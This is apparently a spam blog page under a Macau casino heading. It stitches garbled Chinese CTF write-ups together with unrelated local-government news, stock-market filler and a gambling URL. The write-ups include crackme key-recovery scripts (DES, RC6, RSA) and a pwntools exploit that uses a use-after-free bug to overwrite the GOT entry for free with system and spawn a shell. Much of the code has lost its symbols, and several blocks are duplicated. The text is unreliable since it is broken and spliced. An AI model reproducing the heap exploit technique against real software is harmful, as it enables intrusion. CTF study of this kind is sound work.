澳门信誉赌场

函数KiCommitThreadWait()添加线程,KiSignalThread()移除线程。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A ,但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。此外,2015年以来,国电集团白花山风电、海大集团贵港饲料生产、步步高集团贵港购物广场、万达集团贵港广场、恒大集团贵港恒大城、碧桂园集团贵港房地产等国际知名企业或全国五百强企业项目纷纷落户港北并开工、投产,投资洼地优势和成效进一步突显。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。分析发现这是RSA算法,提供了N和D,输入e和p进行匹配。、我们要把落实河长制和学习贯彻党的十九大精神结合在一起,筑牢绿水青山就是金山银山的理念,坚持绿色发展,加快水污染防治,实施流域环境综合治理,加强农业面源污染防治,开展农村人居环境整治行动,着力解决突出环境问题,坚决制止和惩处破坏生态环境行为,将《贵港市全面推行河长制工作方案》明确的河长制六大任务29项具体工作贯彻好、执行好,用实实在在的行动和成效把十九大精神落到实处。1.处理逻辑(大数运算用的gmp)sn长度为70,前6位是e,后面的是p已知n,d,pq,求e,p,qn:6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d:2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B2.求解因为e0x1000000,所以可以穷举e,得到e:F552B3有了e,因为e过小,可以直接得到p和q这里借用stackoverflow上的内容3.脚本importitertoolsfromgmpy2import*#e=0xF552B3n=0x6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d=0x2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4Bdefget_e(n,d):(0xFFFFFF,-1):ifi=2:return0e=iifnotis_prime(e,500):continuem=0x12345678c=powmod(m,d,n)m2=powmod(c,e,n)ifm==m2:returnereturn0defget_p_q(e,n,d):ed=mul(e,d)k1=div(ed,n)kk=[k1-1,k1,k1+1]foriinrange(len(kk)):k=kk[i](t,rem)=t_divmod(ed-1,k)if(rem!=0):continues=n+(1)-(t)r=isqrt(mul(s,s)-mul(4,n))p=div(s+r,2)q=div(s-r,2)if(pq):p=qprint(sn:%X%X%(e,p))returne=get_e(n,d)print(e:%X%e)get_p_q(e,n,d),UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。

  • 博客访问: 419244
  • 博文数量: 713
  • 用 户 组: 普通用户
  • 注册时间:2018-8-14 14:44:59
  • 认证徽章:
个人简介

他表示,就中国市场而言,2018年将按照原计划引进一款高端智能车型,但工作的重心还是围绕在上海的工厂开展。国债收益率提高,通常会降低股市及其他风险资产的吸引力。其次,乐视网终于复牌了,对于创业板来说,最大的靴子终于落地,创业板出现放量大举反攻,结果却没有为创业板带来转机,反而为想从中小盘个股撤资转战权重蓝筹的投资者,提供了一次减仓的机会,随后创业板带动中小盘股大跌。,  周五盘中,美国10年期国债收益率一度攀升至%,创2014年1月以来新高。他说是中原镇平支行让他找企业做代偿,并且前后两笔贷款的申请资料都没变。。  近日,德国财政部长彼得·阿尔特迈尔和法国财政部长布鲁诺·勒梅尔在巴黎联合举行新闻发布会,表示将在今年阿根廷举行的二十国集团峰会中联合推动全球对比特币的监管,将警告这一世界最流行的加密货币正在被非法团体利用。筛选行业玻璃行业传媒娱乐船舶制造电力行业电器行业电子器件电子信息发电设备纺织机械纺织行业飞机制造服装鞋类钢铁行业公路桥梁供水供气化工行业化纤行业环保行业机械行业家电行业家具行业建筑建材交通运输酒店旅游开发区煤炭行业摩托车酿酒行业农林牧渔农药化肥汽车制造商业百货食品行业水泥行业塑料制品陶瓷行业物资外贸医疗器械仪器仪表印刷包装造纸行业石油行业综合行业金融行业房地产其它行业生物制药有色金属地域北京天津河北山西内蒙古辽宁吉林黑龙江上海江苏浙江安徽福建江西山东河南湖北湖南广东广州深圳广西海南四川贵州云南西藏重庆陕西甘肃青海宁夏新疆概念5G概念IP变现军民融合可燃冰免疫治疗雄安新区新零售智能电网黄河三角海峡西岸成渝特区铁路基建物联网军工航天黄金概念创投概念ST板块低碳经济含H股含B股次新股含可转债稀缺资源融资融券三网融合武汉规划多晶硅锂电池稀土永磁核电核能触摸屏水利建设长株潭皖江区域太阳能卫星导航云计算电子支付新三板海工装备保障房涉矿概念金融改革页岩气生物疫苗文化振兴宽带提速IPV6概念食品安全奢侈品图们江三沙概念3D打印海水淡化碳纤维地热能摘帽概念苹果概念重组概念安防服务建筑节能智能交通空气治理充电桩4G概念石墨烯风沙治理土地流转聚氨酯生物质能东亚自贸丝绸之路体育概念博彩概念O2O模式特斯拉生态农业水域改革风能燃料电池草甘膦京津冀粤港澳基因概念阿里概念海上丝路抗癌抗流感维生素农村金融汽车电子固废处理装饰园林赛马概念猪肉节能污水处理国产软件基因测序电商概念基因芯片氢燃料国企改革超导概念智能家居蓝宝石智能机器机器人概念天津自贸信息安全油气改革民营医院养老概念民营银行婴童概念广东自贸上海自贸互联金融网络游戏智能穿戴前海概念绿色照明风能概念生物育种内贸规划生物燃料准ST股业绩预降业绩预升送转潜力高校背景节能环保陕甘宁自贸区日韩贸易外资背景整体上市本月解禁金融参股社保重仓保险重仓信托重仓券商重仓QFII重仓精选指数分拆上市超级细菌上海本地深圳本地振兴沈阳沿海发展央企50超大盘参股金融基金重仓股期概念股权激励甲型流感迪士尼出口退税新能源未股改循环经济资产注入类型预减预降预亏预增减亏预升预盈预警预平。

文章分类

全部博文(704)

文章存档

2015年(895)

2014年(393)

2013年(573)

2012年(689)

订阅
www.vns55500.com 2018-8-14 14:44:59

分类: 有问必答

这样一来,传统习俗的形式和精神得以保留,而其糟粕和陋习则被否弃。短期内上马大量建设项目,就是为了维持高投资、高增速,实际上还是GDP挂帅。,澳门信誉赌场,OD载入,输入123456,点确定半天没反应,忽然来个内存异常。  在船上召开的座谈会上,李新元首先与大家共同学习党的十九大精神。 通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528(完)相关链接:WindowsDefenderExploitGuard的网络保护功能利用ISG提供的情报,在必要的情况下对所有出站连接进行审查,并在必要时阻止所有出站连接。。  去年,港北区招商引资快马加鞭,签约落户项目49个、投资额亿元,利用内资亿元、外资亿美元,完成项目策划28个,2015-2017年累计入驻标房万平方米、累计开工项目92个、累计竣工投资亿元项目47个。关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。,处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A。 16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy08该结构被工作集整理者用来判定该特定页是否是一个潜在的可整理候选页,也就是说从进程的工作集中移除。1.处理逻辑name是内置的:readyucode是输入的int__cdeclsub_40AEF0(HWNDhDlg){...GetDlgItemTextA(hDlg,1000,name,64);v1=GetDlgItemTextA(hDlg,1001,code,256);v2=v1;if(v1=0x21){if(code[0]!=0x30){v3=0;if(v1=0){LABEL_9:memset(byte_41BC84,0,sizeof(byte_41BC84));v5=off_418078[check(code,name)];MessageBoxA(hDlg,v5,v5,0);return0;}while(1){v4=code[v3];if(!isxdigit(v4)||islower(v4))break;if(++v3=v2)gotoLABEL_9;}}...}z=10000000000000000000000000000000000000000000000000000000000000000079r=code^5modzr有34字节,前17字节作为x,后17字节作为yepInput=(x,y)根据name计算3个md5值:md0=md5(\x01readyu-pediy)=51C75F1F444BAA97ED18DD6C340835D7md1=md5(\x02\x02readyu-2017)=0E5CF7F068D6EFA16F42F935EC424A75md2=md5(\x03\x03\x03readyu-crackme)=A4CD1D64486ABDE1BE441944460CD41D椭圆曲线:m=131,a=13,b=2,c=1,a2=0,a6=1前面的epInput是这个曲线上的点ep1=(51C99BFA6F18DE467C80C23B98C7994AA,42EA2D112ECEC71FCF7E000D7EFC978BD)ep2=(6C997F3E7F2C66A4A5D2FDA13756A37B1,4A38D11829D32D347BD0C0F584D546E9A)n=200000000000000004D4FDD5703A3F269校验(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modnsignedint__cdeclcheck(char*code,constchar*a2){...get_mip();v29[0]=0;memset(v29[1],0,0x20u);*(_WORD*)v29[33]=0;v29[35]=0;ptr[0]=0x10;ptr[1]=0;ptr[2]=0;ptr[3]=0;ptr[4]=0;ptr[5]=0;ptr[6]=0;ptr[7]=0;ptr[8]=0;ptr[9]=0;ptr[10]=0;ptr[11]=0;ptr[12]=0;ptr[13]=0;ptr[14]=0;ptr[15]=0;ptr[16]=0;ptr[17]=0;ptr[18]=0;ptr[19]=0;ptr[20]=0;ptr[21]=0;ptr[22]=0;ptr[23]=0;ptr[24]=0;ptr[25]=0;ptr[26]=0;ptr[27]=0;ptr[28]=0;ptr[29]=0;ptr[30]=0;ptr[31]=0;ptr[32]=0;ptr[33]=0x79;mirsys_init();v2=z;a2_1=::a2;v4=::x;y=d